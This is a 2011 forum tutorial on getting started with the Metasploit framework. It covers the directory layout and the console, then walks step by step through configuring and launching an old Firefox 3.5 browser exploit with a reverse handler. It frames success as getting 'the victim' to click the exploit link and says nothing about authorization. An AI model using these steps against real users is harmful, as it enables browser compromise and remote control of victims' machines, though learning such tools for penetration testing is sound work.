1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How to get started with Metasploit

Discussion in 'Ethical hacking Tips' started by lionaneesh, Jan 26, 2011.

  1. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    Metasploit is a Hacking Framework consisting of tools , exploits , Knowledge etc etc...Its a Boon to pen-testers , exploit developers and Hackers ...

    This Project was started by H.D Moore and is now open source project managed by Rapid7

    For Downloading and installing instructions Click here

    I will use my Ubuntu 10.10 OS for code samples. So , some commands maybe different on other OS versions and if you have queries and questions please don't hesitate to post in comments below.

    The directory structure



    Metasplot have a very self-explanatory and a user-friendly directory structure..

    The metasploit directory is located at /opt/metasploit3 in Linux

    Code:
    aneesh@aneesh-laptop:~$ cd /opt/metasploit3/
    aneesh@aneesh-laptop:/opt/metasploit3$ 
    
    Lets see the different directories :-

    Code:
    aneesh@aneesh-laptop:/opt/metasploit3$ ls
    
    app  bin  env.sh  lib  msf3  run.sh
    
    aneesh@aneesh-laptop:/opt/metasploit3$ cd msf3/
    
    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ ls
    
    armitage       HACKING  msfconsole  msfgui       msfpescan  plugins  tools
    
    data           lib      msfd        msfmachscan  msfrpc     README
    
    documentation  modules  msfelfscan  msfopcode    msfrpcd    scripts
    
    external       msfcli   msfencode   msfpayload   msfupdate  test
    
    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ 
    
    
    The Data directory : contains the basic data for exploits like php sources , wordlists etc etc...

    Code:
    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd data/
    
    aneesh@aneesh-laptop:/opt/metasploit3/msf3/data$ ls
    
    armitage             isight.bundle            passivex   vncdll.dll
    
    eicar.com            java                     php        vncdll.x64.dll
    
    eicar.txt            lab                      post       wmap
    
    emailer_config.yaml  meterpreter              snmp       wordlists
    
    exploits             msfcrawler               sounds
    
    gui                  msflinker_linux_x86.bin  sql
    
    ipwn                 msfpescan                templates
    
    
    The lib directory : The name is pretty self-explanatory , its the file that contains all the libraries necessary to work metasploit

    The main directory that is of great use to us is the modules directory

    Code:
    aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd modules
    
    aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ ls
    
    auxiliary  encoders  exploits  modules.rb.ts.rb  nops  payloads  post
    
    aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ 
    
    • The exploit dir : contains the exploits for various architectures
    • The encoders dir : Contains varoius encoders for encoding pages , programs etc etc...
    • The auxiliary dir : Contains a list of tools used for pen-testing like DOS , sniffers , etc etc..
    • The payloads, nops dir : Provides the shellcodes used for exploitations...(Code execution)

    Getting to know Metasploit



    The main part of metasploit is its interface types. The four main types of interfaces are :-
    1. msfweb (The Web Interface)
    2. msfgui (The graphical user interface)
    3. msfconsole (The console interface)
    4. msfcli (The command line interface)
    The most powerful and the most used interface is the Console interface so , We'll be looking at that throughout this tutorial...

    To open metasploit just type 'msfconsole' in your shell and you should get an output similar to this :-
    Code:
    aneesh@aneesh-laptop:~$ msfconsole
                                      _
    
                                     | |      o
    
     _  _  _    _ _|_  __,   ,    _  | |  __    _|_
    
    / |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
    
      |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
    
                               /|
    
                               \|
    
           =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
    
    + -- --=[ 643 exploits - 328 auxiliary
    
    + -- --=[ 216 payloads - 27 encoders - 8 nops
    
           =[ svn r11647 updated today (2011.01.26)
    
    msf > 
    
    Now that we know how to open metasploit lets see some of its modules...

    We use several commands for it :-

    The show all command syntax - show all
    The search command syntax - search (pattern)

    For eg :-

    Lets search for firefox exploits and see whats there in stores for us

    Code:
    msf > search firefox
    
    [*] Searching loaded modules for pattern 'firefox'...
    
    Exploits
    
    ========
    
       Name                                              Disclosure Date  Rank       Description
    
       ----                                              ---------------  ----       -----------
    
       multi/browser/firefox_escape_retval               2006-07-14       normal     Firefox 3.5 escape() Return Value Memory Corruption
    
       multi/browser/firefox_queryinterface              2006-02-02       normal     Firefox location.QueryInterface() Code Execution
    
       multi/browser/mozilla_compareto                   2005-07-13       normal     Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
    
       multi/browser/mozilla_navigatorjava               2006-07-25       normal     Mozilla Suite/Firefox Navigator Object Code Execution
    
       windows/browser/apple_quicktime_rtsp              2007-01-01       normal     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
    
       windows/browser/awingsoft_winds3d_sceneurl        2009-11-14       excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
    
       windows/browser/dxstudio_player_exec              2009-06-09       excellent  Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
    
       windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
    
    msf > 
    
    You will notice that there are many of exploits on browser vulnerabilities..and maybe some are useful for us...

    This is the power of metasploit!!

    lets use the 'use' command to select a exploit

    Syntax :-
    Code:
    use (path)
    
    Output :-
    Code:
    msf > use exploit/multi/browser/firefox_escape_retval 
    
    msf exploit(firefox_escape_retval) > 
    
    Now lets see the options.
    Code:
    show options
    
    Output :-
    Code:
    msf exploit(firefox_escape_retval) > show options
    
    Module options (exploit/multi/browser/firefox_escape_retval):
    
       Name        Current Setting  Required  Description
    
       ----        ---------------  --------  -----------
    
       SRVHOST     0.0.0.0          yes       The local host to listen on.
    
       SRVPORT     8080             yes       The local port to listen on.
    
       SSL         false            no        Negotiate SSL for incoming connections
    
       SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
    
       URIPATH                      no        The URI to use for this exploit (default is random)
    
    Exploit target:
    
       Id  Name
    
       --  ----
    
       0   Firefox 3.5.0 on Windows XP SP0-SP3
    
    Let us now set the options

    This can be done by using :-

    Code:
    set (option name) (value)
    
    Now lets set some options according to our needs
    Code:
    msf exploit(firefox_escape_retval) > set SRVHOST localhost
    
    SRVHOST => localhost
    
    msf exploit(firefox_escape_retval) > set SRVPORT 80
    
    SRVPORT => 80
    
    msf exploit(firefox_escape_retval) > set URIPATH /exploit
    
    URIPATH => /exploit
    
    Explanations :-

    1. The 'set SRVHOST localhost' means set the host to localhost this is the server on which our exploit is hosted..
    2. The 'set SRVPORT 80' means this is the Post no on which the server will be hosted …
    3. As we know Post 80 is default for web-servers we use this The 'set URIPATH /exploit' means the URLPATH of the exploit...

    This means that we have to bring the victim to click on the page of url http://localhost/exploit
    So as to make the exploit work!!

    Now as the options are set lets run the exploit...

    This can be done by :-

    Code:
    exploit
    
    Output :-
    Code:
    msf exploit(firefox_escape_retval) > exploit
    
    [*] Exploit running as background job.
    
    [*] Started reverse handler on 10.10.2.35:4444 
    
    [*] Using URL: http://localhost:80/exploit
    
    [*] Server started.
    
    
    So the output states that we have successfully started the exploit!!

    Now the work gets a lot more easier...

    We just have to make a user with this Browser vulnerability click this link..

    I hope it is enough to get you started working with metasploit...
     
  2. lionaneesh

    lionaneesh Active Member

    Joined:
    Mar 21, 2010
    Messages:
    848
    Likes Received:
    224
    Trophy Points:
    43
    Occupation:
    Student
    Location:
    India
    Thanks Shabbir...
    For accepting my articles and making it much better with the edits...

    Thanks a ton!!!
     

Share This Page